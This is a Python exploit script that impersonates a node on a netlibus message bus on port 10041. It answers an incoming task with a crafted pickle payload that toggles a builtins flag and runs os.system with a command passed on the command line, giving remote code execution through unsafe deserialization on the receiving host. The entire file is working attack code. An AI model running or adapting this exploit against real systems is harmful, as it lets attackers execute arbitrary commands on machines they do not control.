# -*- encoding: utf-8 -*-
import sys
import socket
from uuid import uuid4
import netlibus

import time

import pickleutils as pickle
import msgpackutils as msgpack
from envelope import Envelope, build_tree
from utils import parse_message, CURRENT_VERSION


PAYLOAD = [
    pickle.craft(
        func=pickle.attr("api.copier.errors.__getattribute__"),
        args=["__builtins__"],
        items=[("True", False)],
    ),
    pickle.craft(
        func=pickle.attr("os.system"),
        args=["/bin/ls -la" if len(sys.argv) == 1 else sys.argv[1]],
    ),
    pickle.craft(
        func=pickle.attr("api.copier.errors.__getattribute__"),
        args=["__builtins__"],
        items=[("True", True)],
    ),
]

def heartbeat_msg(taskid):
    return {
        'uuid': str(uuid4()),
        'taskid': taskid,
        'type': 'heartbeat',
        'aggr': True,
        'request_rpc': None,
    }

def response_msg(taskid, index, data):
    return {
        'uuid': str(uuid4()),
        'taskid': taskid,
        'type': 'response',
        'index': index,
        'content': {
            'type': 'result',
            'data': data
        }
    }


def process_envelope(bus, envelope, addr):
    task = envelope.msgs.pop()
    
    def send(msg):
        env = Envelope(msg, build_tree(envelope.path[:1]))
        dest = envelope.initiator()[1][0]

        env.path.insert(0, (envelope.hostid, (socket.getfqdn(), 10041)))
        
        for (hostid, next_envelope) in env.next():
            bus.send((CURRENT_VERSION, ('route', next_envelope)), addr, dest)

    send(heartbeat_msg(task['uuid']))
    time.sleep(5)
    send(response_msg(task['uuid'], 0, pickle.dumps((None, PAYLOAD))))


class Netlibus(object):
    def __init__(self, port):
        self.bus = netlibus.MsgBus(port)

    def __enter__(self):
        self.bus.start()
        return self

    def __exit__(self, type, value, traceback):
        self.bus.stop()

    def receive(self):
        tup = self.bus.receive()
        msg = tup[0]
        addr = tup[1].rsplit(':', 1)
        iface = tup[2].rsplit(':', 1)[0] if len(tup) > 2 else None
        if iface and iface.startswith('[') and iface.endswith(']'):
            iface = iface[1:-1]
        return msgpack.loads(msg), (addr[0], int(addr[1])), iface

    def send(self, envelope, addr, dest):
        msg = msgpack.dumps(envelope)

        print('[+] sending response to %s:%d (%s): %r' % (addr[0], addr[1], dest, msg))
        self.bus.send_ex(msg, [addr], dest=dest)


with Netlibus(port=10041) as bus:
    print('[+] netlibus started, wait...')
    msg, addr, iface = bus.receive()
    cmd, envelope = parse_message(msg)
    envelope.path.append((envelope.hostid, addr))
    process_envelope(bus, envelope, addr)
    print('[+] done')
